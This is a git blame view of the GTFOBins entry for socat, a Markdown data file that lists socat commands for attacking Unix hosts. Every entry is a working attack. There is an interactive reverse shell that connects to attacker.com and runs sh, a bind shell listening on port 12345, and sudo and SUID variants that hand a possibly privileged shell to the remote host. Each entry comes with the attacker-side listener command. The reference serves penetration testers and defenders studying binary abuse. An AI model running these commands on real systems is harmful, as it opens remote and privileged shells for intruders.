GTFOBins.github.io/_gtfobins/socat.md

27 lines
1.1 KiB
Markdown
Raw Normal View History

2018-05-22 20:40:27 +00:00
---
functions:
2018-05-25 13:30:02 +00:00
reverse-shell-interactive:
2018-07-22 14:22:03 +00:00
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
2018-07-16 13:01:50 +00:00
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
2018-05-25 13:30:02 +00:00
bind-shell-interactive:
2018-07-22 14:22:03 +00:00
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
2018-07-16 13:01:50 +00:00
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
sudo-enabled:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
suid-limited:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
2018-05-24 23:10:39 +00:00
---